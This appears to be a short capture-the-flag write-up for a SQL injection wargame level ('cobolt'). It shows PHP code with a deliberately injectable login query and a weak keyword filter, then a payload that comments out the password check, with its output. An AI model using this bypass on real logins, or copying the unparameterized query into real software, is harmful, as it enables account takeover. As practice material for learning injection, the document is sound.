include "./config.php";
login_chk();
dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from prob_cobolt where id='{$_GET[id]}' and pw=md5('{$_GET[pw]}')";
echo "
query : {$query}
";
$result = @mysql_fetch_array(mysql_query($query));
if($result['id'] == 'admin') solve("cobolt");
elseif($result['id']) echo "Hello {$result['id']}
You are not admin :(
";
highlight_file(__FILE__);
PAYLOAD: ?id=admin'-- -
OUTPUT: select id from prob_cobolt where id='admin'-- -' and pw=md5('') Cobolt clear